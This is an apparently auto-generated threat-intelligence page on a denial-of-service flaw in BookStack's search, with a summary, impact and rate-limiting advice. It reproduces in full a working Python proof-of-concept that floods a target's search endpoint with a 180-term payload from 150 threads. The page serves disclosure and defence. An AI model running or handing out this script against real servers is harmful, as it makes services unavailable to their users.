BookStack 25.12.1 - Denial of Service
A denial of service (DoS) vulnerability affects BookStack versions prior to 25. 12. 1. The issue arises from a search functionality that constructs complex SQL queries with many OR LIKE conditions, full table scans, and subqueries, leading to resource exhaustion. Exploit code in Python is publicly available demonstrating how to overwhelm the service by sending many concurrent search requests with a crafted payload. No official patch or vendor advisory confirming a fix is provided in the data. The severity is assessed as medium based on the described impact and available information.
AI Analysis
Technical Summary
BookStack versions before 25.12.1 are vulnerable to a denial of service attack via the search feature. The exploit sends a search query containing 180 terms that generate expensive SQL queries involving multiple OR LIKE clauses, full table scans, and subqueries. This causes resource exhaustion on the backend database and web server, resulting in service unavailability. A Python-based proof-of-concept exploit uses 150 concurrent threads to repeatedly send the malicious search request, causing timeouts and connection errors. The vulnerability is publicly documented with exploit code but lacks an assigned CVE and official patch information.
Potential Impact
Successful exploitation results in denial of service, making the BookStack application unavailable or unresponsive to legitimate users. The attack leverages resource exhaustion through complex search queries, impacting service availability but not directly indicating data compromise or privilege escalation. There are no known exploits in the wild reported at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider limiting or rate-limiting search requests, especially those with complex or large query terms, to reduce the risk of resource exhaustion. Monitor for updates from the BookStack project regarding security advisories and patches.
Indicators of Compromise
- exploit-code: # Exploit Title: BookStack 25.12.1 - Denial of Service Search Terms (Resource Exhaustion) # Date: 2026-04-29 # Exploit Author: Gabriel Rodrigues (TEXUGO) # Vendor Homepage: https://www.bookstackapp.com # Software Link: https://github.com/BookStackApp/BookStack # Version: < 25.12.1 # Tested on: BookStack v25.12 (Docker) + PHP 8.3 + MySQL 8.0 # CVE: Pending (Request ID: 1970573) # References: # https://www.bookstackapp.com/blog/bookstack-release-v25-12-1/ # https://github.com/BookStackApp/BookStack/security/advisories (if any) """ BookStack DoS PoC python3 poc_dos_search.py http://localhost:8080 [cookie] """ import requests, sys, time from urllib.parse import quote from concurrent.futures import ThreadPoolExecutor # Payload: 100 termos + 50 exatos + 30 tags = 180 termos de busca # Gera query SQL com muitos OR LIKE, full table scans e subqueries PAYLOAD = " ".join([f"t{i}" for i in range(100)] + [f'"e{i}"' for i in range(50)] + [f"[t{i}=v{i}]" for i in range(30)]) stop = False def attack(url, headers): s = requests.Session() while not stop: try: s.get(url, headers=headers, timeout=30) except: pass def main(): global stop url = sys.argv[1].rstrip("/") cookie = sys.argv[2] if len(sys.argv) > 2 else None search_url = f"{url}/search?term={quote(PAYLOAD)}" headers = {"Cookie": cookie} if cookie else {} print(f"[*] Query: {PAYLOAD[:80]}...") print(f"[*] URL completa tem {len(search_url)} bytes") print(f"[*] Atacando {url} com 150 threads por 30s\n") with ThreadPoolExecutor(150) as ex: [ex.submit(attack, search_url, headers) for _ in range(150)] for i in range(15): time.sleep(2) try: r = requests.get(url, timeout=3) print(f"[{(i+1)*2:2d}s] ONLINE - {r.status_code}") except requests.exceptions.Timeout: print(f"[{(i+1)*2:2d}s] OFFLINE - TIMEOUT") except: print(f"[{(i+1)*2:2d}s] OFFLINE - CONNECTION ERROR") stop = True if __name__ == "__main__": main()
BookStack 25.12.1 - Denial of Service
Description
A denial of service (DoS) vulnerability affects BookStack versions prior to 25. 12. 1. The issue arises from a search functionality that constructs complex SQL queries with many OR LIKE conditions, full table scans, and subqueries, leading to resource exhaustion. Exploit code in Python is publicly available demonstrating how to overwhelm the service by sending many concurrent search requests with a crafted payload. No official patch or vendor advisory confirming a fix is provided in the data. The severity is assessed as medium based on the described impact and available information.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
BookStack versions before 25.12.1 are vulnerable to a denial of service attack via the search feature. The exploit sends a search query containing 180 terms that generate expensive SQL queries involving multiple OR LIKE clauses, full table scans, and subqueries. This causes resource exhaustion on the backend database and web server, resulting in service unavailability. A Python-based proof-of-concept exploit uses 150 concurrent threads to repeatedly send the malicious search request, causing timeouts and connection errors. The vulnerability is publicly documented with exploit code but lacks an assigned CVE and official patch information.
Potential Impact
Successful exploitation results in denial of service, making the BookStack application unavailable or unresponsive to legitimate users. The attack leverages resource exhaustion through complex search queries, impacting service availability but not directly indicating data compromise or privilege escalation. There are no known exploits in the wild reported at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider limiting or rate-limiting search requests, especially those with complex or large query terms, to reduce the risk of resource exhaustion. Monitor for updates from the BookStack project regarding security advisories and patches.
Technical Details
- Edb Id
- 52571
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for BookStack 25.12.1 - Denial of Service
# Exploit Title: BookStack 25.12.1 - Denial of Service Search Terms (Resource Exhaustion) # Date: 2026-04-29 # Exploit Author: Gabriel Rodrigues (TEXUGO) # Vendor Homepage: https://www.bookstackapp.com # Software Link: https://github.com/BookStackApp/BookStack # Version: < 25.12.1 # Tested on: BookStack v25.12 (Docker) + PHP 8.3 + MySQL 8.0 # CVE: Pending (Request ID: 1970573) # References: # https://www.bookstackapp.com/blog/bookstack-release-v25-12-1/ # https://github.com/BookStackApp/BookSta... (1630 more characters)
Threat ID: 6a0f29ffe1370fbb48ed2e8f
Added to database: 5/21/2026, 3:51:27 PM
Last enriched: 5/21/2026, 3:51:52 PM
Last updated: 5/21/2026, 4:58:38 PM
Views: 2
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.